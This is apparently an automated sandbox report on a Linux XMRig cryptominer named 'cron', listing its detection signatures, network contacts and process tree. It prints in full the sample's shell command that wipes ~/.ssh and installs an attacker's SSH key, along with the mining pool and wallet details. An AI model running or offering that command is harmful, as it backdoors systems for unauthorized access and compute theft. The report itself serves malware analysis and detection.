Analysis Report cron

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:202041
Start date:20.01.2020
Start time:02:54:41
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:cron
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal76.troj.mine.lin@0/2@4/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 91.189.92.20, 91.189.92.19, 91.189.92.41, 91.189.92.38
  • Excluded domains from analysis (whitelisted): api.snapcraft.io

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 76 | 0 - 100 | false | | Xmrig | malicious

Classification

Mitre Att&ck Matrix

Techniques with a count in parentheses were triggered by that many signatures in this analysis; the other entries are the matrix's default placeholders.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command-Line Interface (1); Scripting (1); Windows Management Instrumentation; Scheduled Task
Persistence: Hidden Files and Directories (1); Port Monitors; Accessibility Features; System Firmware
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception; DLL Search Order Hijacking
Defense Evasion: Hidden Files and Directories (1); File and Directory Permissions Modification (1); Scripting (1); File Deletion (1)
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: Security Software Discovery (1); File and Directory Discovery (1); System Information Discovery (3); System Network Configuration Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Standard Non-Application Layer Protocol (1); Standard Application Layer Protocol (1); Custom Cryptographic Protocol; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Premium SMS Toll Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

Signature Overview

AV Detection:

Antivirus detection for sample
Source: cron; Avira: detection malicious, Label: LINUX/BitCoinMiner.cgymm
Multi AV Scanner detection for submitted file
Source: cron; Virustotal: Detection: 40%

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match; File source: cron, type: SAMPLE
Detected Stratum mining protocol
Source: global traffic; TCP traffic: 192.168.2.20:45164 -> 45.9.148.125:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 42 4c 41 76 4c 4e 61 79 65 66 71 4e 61 64 33 74 47 70 48 4b 50 7a 76 69 51 55 59 48 46 31 6d 43 61 70 4d 68 67 52 75 69 69 41 4a 50 59 58 34 4b 79 52 43 56 67 39 76 65 54 6d 63 6b 50 4e 37 62 44 65 62 78 35 31 4c 43 75 44 51 59 79 68 46 67 56 62 55 4d 68 63 34 71 59 31 34 43 51 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 35 2e 35 2e 30 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 34 2e 30 20 67 63 63 2f 38 2e 33 2e 30 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 2f 31 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65
Decoded as ASCII, the captured bytes above are the Stratum JSON-RPC login request (the capture is truncated after the last algorithm name): {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ","pass":"x","agent":"XMRig/5.5.0 (Linux x86_64) libuv/1.34.0 gcc/8.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double
Found strings related to Crypto-Mining
Source: cron; String found in binary or memory: stratum+ssl://
Source: cron; String found in binary or memory: cryptonight/0
Source: cron; String found in binary or memory: -o, --url=URL URL of mining server
Source: cron; String found in binary or memory: stratum+tcp://
Source: cron; String found in binary or memory: XMRig
Source: cron; String found in binary or memory: Usage: xmrig [OPTIONS]
Reads CPU information from /proc indicative of miner or evasive malware
Source: /tmp/cron (PID: 20755); Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malware
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /tmp/cron (PID: 20755); Reads CPU info from /sys: /sys/devices/system/cpu/possible

Networking:

Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: debian-package.center
Urls found in memory or binary data
Source: cron; String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: cron; String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary:

Sample contains strings that are potentially command strings
Source: Initial sample; Potential command found: w ATI
Source: Initial sample; Potential command found: cmp r,i
Source: Initial sample; Potential command found: file already exists
Source: Initial sample; Potential command found: file too large
Source: Initial sample; Potential command found: host is unreachable
Source: Initial sample; Potential command found: file table overflow
Source: Initial sample; Potential command found: host is down
Source: Initial sample; Potential command found: service not available for socket type
Source: Initial sample; Potential command found: w == &loop->async_io_watcher
Source: Initial sample; Potential command found: start + CMSG_LEN(count * sizeof(*pi)) == end
Source: Initial sample; Potential command found: timeout >= -1
Source: Initial sample; Potential command found: timeout != -1
Source: Initial sample; Potential command found: timeout > 0
Source: Initial sample; Potential command found: size > 0
Source: Initial sample; Potential command found: w != NULL
Source: Initial sample; Potential command found: start + CMSG_LEN(count * sizeof(*pi)) == endreq->handle->write_queue_size >= sizeuv__has_active_reqs(stream->loop)stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY!(stream->flags & UV_HANDLE_CLOSING)stream->type == UV_TCP || stream->type == UV_NAMED_PIPE!uv__io_active(&stream->io_watcher, POLLIN | POLLOUT)stream->flags & UV_HANDLE_CLOSEDstream->type == UV_TCP || stream->type == UV_TTY || stream->type == UV_NAMED_PIPE(stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY) && "uv_write (unix) does not yet support other types of streams"!(stream->flags & UV_HANDLE_BLOCKING_WRITES)!uv__io_active(&handle->io_watcher, POLLIN | POLLOUT)uv__stream_closeuv_read_startuv_try_writeuv_write2uv_shutdownuv_acceptuv__server_iouv__stream_destroyuv__stream_openuv__drainuv__write_req_sizeuv__write_callbacksuv__write_req_updateuv__writeuv__stream_recv_cmsguv__readuv__stream_connectuv__stream_iosrc/unix/tcp.chandle->type == UV_TCPUV_TCP_SINGLE_ACCEPTuv__tcp_connectsrc/un
Source: Initial sample; Potential command found: last == hwloc_get_obj_by_depth(topology, depth, width-1)
Source: Initial sample; Potential command found: last != -1
Sample has stripped symbol table
Source: ELF static info symbol of initial sample; .symtab present: no
Classification label
Source: classification engine; Classification label: mal76.troj.mine.lin@0/2@4/0

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/cron (PID: 20755); File: /proc/20755/mounts
Counts the number of processes currently running
Source: /tmp/cron (PID: 20758); Ps with wc executed: /bin/sh -> sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 20762); Directory: .ssh
Executes commands using a shell command-line interpreter
Source: /tmp/cron (PID: 20758); Shell command executed: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 20768); Chmod executable: /bin/chmod -> chmod -R go= /home/user/.ssh
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 20762); Mkdir executable: /bin/mkdir -> mkdir .ssh
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 20760); Rm executable: /bin/rm -> rm -rf .ssh
Reads system information from the proc file system
Source: /tmp/cron (PID: 20755); Reads from proc file: /proc/cpuinfo
Source: /tmp/cron (PID: 20755); Reads from proc file: /proc/meminfo
Source: /tmp/cron (PID: 20772); Reads from proc file: /proc/meminfo
Sample tries to set the executable flag
Source: /bin/chmod (PID: 20768); File: /home/user/.ssh (bits: - usr: - grp: - all: rwx)

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
(Sources for both signatures are the same /proc/cpuinfo and /sys/devices/system/cpu/* reads by /tmp/cron (PID: 20755) already listed under Bitcoin Miner.)
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/cron (PID: 20755); Queries kernel information via 'uname'

Malware Configuration

No configs have been found


Runtime Messages

Command:/tmp/cron
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:[2020-01-20 03:55:23.995] unable to open '/tmp/config.json'.
Standard Error:

Behavior Graph

Behavior Graph ID: 202041, Sample: cron, Startdate: 20/01/2020, Architecture: LINUX, Score: 76 (graph image not reproduced; legend node types: Process, Signature, Created File, DNS/IP Info, Is Dropped, Number of created Files, Is malicious, Internet)
  • Network nodes: 45.9.148.125 (ports 45164, 80; ASN unknown, Netherlands); debian-package.center
  • Sample-level signatures: Antivirus detection for sample; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 2 other signatures
  • Process tree: cron started (signature: Sample reads /proc/mounts (often used for finding a writable filesystem)) -> sh started -> rm, mkdir and chmod started; cron -> cron started

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
cron | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
45.9.148.125 | anacron | malicious
45.9.148.125 | cron | malicious
45.9.148.125 | cQLmNrun | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
debian-package.center | anacron | malicious | 45.9.148.117
debian-package.center | cron | malicious | 45.9.148.129
debian-package.center | cron | malicious | 45.9.148.129

ASN

Match | Associated Sample Name / URL | Detection | Context
unknown | anacron | malicious | 45.9.148.125
unknown | testfile | malicious | 91.189.92.20
unknown | Launcher.apk | malicious | 216.58.201.99
unknown | http://5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi%20portafilter%20size | malicious | 185.211.246.22
unknown | http://5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi portafilter size | malicious | 185.211.246.22
unknown | Project2.doc | malicious | 51.15.6.128
unknown | https://top4top.io/downloadf-11687unj01-rar.html | malicious | 54.38.152.27
unknown | http://www.ltyuye.com/wp-admin/rrktd1y-1v-75/ | malicious | 23.235.217.105
unknown | http://txfc58.com/wordpress/m2utbn-3ft4c-07947/ | malicious | 185.216.113.122
unknown | instructions 01 18 2020.doc | malicious | 23.235.217.105
unknown | instructions 01 18 2020.doc | malicious | 217.160.5.123
unknown | PO987889-JAN-20-20-Order_Quote,pdf.exe | malicious | 172.217.23.193
unknown | koadic_test_online_9997_rundll.vbs | malicious | 79.137.36.9
unknown | http://www.searchnewtabs.com/download | malicious | 52.206.61.22
unknown | http://91.92.66.124/..j/ | malicious | 91.92.66.124
unknown | https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BIXa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.gov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c7b4d9ab9945f2f31b3f780%7C1%7C1%7C637147626986386689&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuCoZ%2FooVfs%3D&reserved=0 | malicious | 209.197.3.24
unknown | http://95.179.163.186 | malicious | 95.179.163.186
unknown | https://perfecttux.com | malicious | 147.75.84.39
unknown | INVOICE FAF3766_778982019.doc | malicious | 185.216.113.122
unknown | INVOICE FAF3766_778982019.doc | malicious | 217.160.5.123

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
cron | 41% | Virustotal |
cron | 100% | Avira | LINUX/BitCoinMiner.cgymm

Dropped Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
debian-package.center | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://xmrig.com/docs/algorithms | 0% | Virustotal |
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe

Startup

• system is lnxubuntu1
• cron (PID: 20755, Parent: 20706, MD5: 84945e9ea1950be3e870b798bd7c7559) Arguments: /tmp/cron
  • cron New Fork (PID: 20758, Parent: 20755)
  • sh (PID: 20758, Parent: 20755, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
    • sh New Fork (PID: 20760, Parent: 20758)
    • rm (PID: 20760, Parent: 20758, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh
    • sh New Fork (PID: 20762, Parent: 20758)
    • mkdir (PID: 20762, Parent: 20758, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh
    • sh New Fork (PID: 20768, Parent: 20758)
    • chmod (PID: 20768, Parent: 20758, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh
  • cron New Fork (PID: 20772, Parent: 20755)
• cleanup

Created / dropped Files

/home/user/.ssh/authorized_keys
Process:/bin/sh
File Type:OpenSSH RSA public key
Size (bytes):389
Entropy (8bit):5.91239652812259
Encrypted:false
MD5:A420F7A60A40F3FF3A806A01FEB1DFDA
SHA1:1AE65132B036DE51BCC62F66B51AE362E11182AF
SHA-256:A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
SHA-512:1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
Malicious:false
Reputation:low
Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Process:/tmp/cron
File Type:ASCII text, with no line terminators
Size (bytes):6
Entropy (8bit):1.9182958340544893
Encrypted:false
MD5:1054DD099E3998ACB4C217F5AE41D8C8
SHA1:9F649342B81C46321145FB8F13EDD0F61487F1B4
SHA-256:498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A
SHA-512:03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7
Malicious:false
Reputation:low
Preview: 128129

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
debian-package.center | 45.9.148.117 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://gcc.gnu.org/bugs/): | cron | false | | high
https://xmrig.com/docs/algorithms | cron | false | 0% (Virustotal); Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
45.9.148.125 | Netherlands | 49447 | unknown | true

Static File Info

General

File type:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
Entropy (8bit):6.344544956625536
TrID:
• ELF Executable and Linkable format (Linux) (4029/14) 49.77%
• ELF Executable and Linkable format (generic) (4004/1) 49.46%
• Lumena CEL bitmap (63/63) 0.78%
File name:cron
File size:2401096
MD5:84945e9ea1950be3e870b798bd7c7559
SHA1:95b4a0e956499b8ea07cd5e880ac7dd2d88131c1
SHA256:fd9007df08c1bd2cf47fb97443c4d7360e204f4d8fe48c5d603373b2b2975708
SHA512:0b3c5075f9dde4d316aca1d3ba393a4e69288a1af5c05d1b3e309ddefcd653f3e3a5a8dd859a846ad2a5a34b381b34f9809a6e85ded408ec4b1b9c7964ebaabd
SSDEEP:49152:10cWKu0K8CpxlJWhabW/////////In6C1NdvKODyYGhiDC61N04EXBJDJw5qjURX:+d08xrbW/////////viu6T0lXBJDJwE2
File Content Preview:.ELF..............>.............@.........$.........@.8...@......................................V.......V.......................`.......`.......`......8.......8........................ ....... ....... ......................................@.#.....@.$....

Static ELF Info

ELF header

Class:ELF64
Data:2's complement, little endian
Version:1 (current)
Machine:Advanced Micro Devices X86-64
Version Number:0x1
Type:DYN (Shared object file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x195e7
Flags:0x0
ELF Header Size:64
Program Header Offset:64
Program Header Size:56
Number of Program Headers:9
Section Header Offset:2399496
Section Header Size:64
Number of Section Headers:25
Header String Table Index:24

Sections

Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.gnu.hash | GNU_HASH | 0x238 | 0x238 | 0x1c | 0x0 | 0x2 | A | 2 | 0 | 8
.dynsym | DYNSYM | 0x258 | 0x258 | 0x18 | 0x18 | 0x2 | A | 3 | 1 | 8
.dynstr | STRTAB | 0x270 | 0x270 | 0x1 | 0x0 | 0x2 | A | 0 | 0 | 1
.rela.dyn | RELA | 0x278 | 0x278 | 0x15480 | 0x18 | 0x2 | A | 2 | 0 | 8
.init | PROGBITS | 0x16000 | 0x16000 | 0xd | 0x0 | 0x6 | AX | 0 | 0 | 1
.plt | PROGBITS | 0x16010 | 0x16010 | 0x90 | 0x10 | 0x6 | AX | 0 | 0 | 16
.text | PROGBITS | 0x160c0 | 0x160c0 | 0x1bba70 | 0x0 | 0x6 | AX | 0 | 0 | 64
.fini | PROGBITS | 0x1d1b30 | 0x1d1b30 | 0x8 | 0x0 | 0x6 | AX | 0 | 0 | 1
.rodata | PROGBITS | 0x1d2000 | 0x1d2000 | 0x1cef0 | 0x0 | 0x2 | A | 0 | 0 | 32
.eh_frame_hdr | PROGBITS | 0x1eeef0 | 0x1eeef0 | 0xc18c | 0x0 | 0x2 | A | 0 | 0 | 4
.eh_frame | PROGBITS | 0x1fb080 | 0x1fb080 | 0x3eb90 | 0x0 | 0x2 | A | 0 | 0 | 8
.gcc_except_table | PROGBITS | 0x239c10 | 0x239c10 | 0x5d08 | 0x0 | 0x2 | A | 0 | 0 | 4
.tbss | NOBITS | 0x240c40 | 0x23fc40 | 0x20 | 0x0 | 0x403 | WAT | 0 | 0 | 8
.init_array | INIT_ARRAY | 0x240c40 | 0x23fc40 | 0x108 | 0x8 | 0x3 | WA | 0 | 0 | 8
.fini_array | FINI_ARRAY | 0x240d48 | 0x23fd48 | 0x18 | 0x8 | 0x3 | WA | 0 | 0 | 8
.ctors | PROGBITS | 0x240d60 | 0x23fd60 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
.dtors | PROGBITS | 0x240d70 | 0x23fd70 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
.data.rel.ro | PROGBITS | 0x240d80 | 0x23fd80 | 0x8ed0 | 0x0 | 0x3 | WA | 0 | 0 | 32
.dynamic | DYNAMIC | 0x249c50 | 0x248c50 | 0x190 | 0x10 | 0x3 | WA | 3 | 0 | 8
.got | PROGBITS | 0x249de0 | 0x248de0 | 0x208 | 0x8 | 0x3 | WA | 0 | 0 | 8
.data | PROGBITS | 0x24a000 | 0x249000 | 0xc18 | 0x0 | 0x3 | WA | 0 | 0 | 32
.bss | NOBITS | 0x24ac40 | 0x249c18 | 0xdaa8 | 0x0 | 0x3 | WA | 0 | 0 | 64
.comment | PROGBITS | 0x0 | 0x249c18 | 0x1a | 0x1 | 0x30 | MS | 0 | 0 | 1
.shstrtab | STRTAB | 0x0 | 0x249c32 | 0xd3 | 0x0 | 0x0 | | 0 | 0 | 1

Program Segments

Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x0 | 0x0 | 0x156f8 | 0x156f8 | 0x4 | R | 0x1000 | | .gnu.hash .dynsym .dynstr .rela.dyn
LOAD | 0x16000 | 0x16000 | 0x16000 | 0x1bbb38 | 0x1bbb38 | 0x5 | R E | 0x1000 | | .init .plt .text .fini
LOAD | 0x1d2000 | 0x1d2000 | 0x1d2000 | 0x6d918 | 0x6d918 | 0x4 | R | 0x1000 | | .rodata .eh_frame_hdr .eh_frame .gcc_except_table
LOAD | 0x23fc40 | 0x240c40 | 0x240c40 | 0x9fd8 | 0x17aa8 | 0x6 | RW | 0x1000 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss
DYNAMIC | 0x248c50 | 0x249c50 | 0x249c50 | 0x190 | 0x190 | 0x6 | RW | 0x8 | | .dynamic
TLS | 0x23fc40 | 0x240c40 | 0x240c40 | 0x0 | 0x20 | 0x4 | R | 0x8 | |
GNU_EH_FRAME | 0x1eeef0 | 0x1eeef0 | 0x1eeef0 | 0xc18c | 0xc18c | 0x4 | R | 0x4 | | .eh_frame_hdr
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0x6 | RW | 0x10 | |
GNU_RELRO | 0x23fc40 | 0x240c40 | 0x240c40 | 0x93c0 | 0x93c0 | 0x4 | R | 0x1 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

Dynamic Tags

Type | Meta | Value | Tag
DT_SYMBOLIC | value | 0x0 | 0x10
DT_INIT | value | 0x16000 | 0xc
DT_FINI | value | 0x1d1b30 | 0xd
DT_INIT_ARRAY | value | 0x240c40 | 0x19
DT_INIT_ARRAYSZ | bytes | 264 | 0x1b
DT_FINI_ARRAY | value | 0x240d48 | 0x1a
DT_FINI_ARRAYSZ | bytes | 24 | 0x1c
DT_GNU_HASH | value | 0x238 | 0x6ffffef5
DT_STRTAB | value | 0x270 | 0x5
DT_SYMTAB | value | 0x258 | 0x6
DT_STRSZ | bytes | 1 | 0xa
DT_SYMENT | bytes | 24 | 0xb
DT_DEBUG | value | 0x0 | 0x15
DT_PLTGOT | value | 0x249de0 | 0x3
DT_RELA | value | 0x278 | 0x7
DT_RELASZ | bytes | 87168 | 0x8
DT_RELAENT | bytes | 24 | 0x9
DT_BIND_NOW | value | 0x0 | 0x18
DT_FLAGS_1 | value | 0x8000001 | 0x6ffffffb
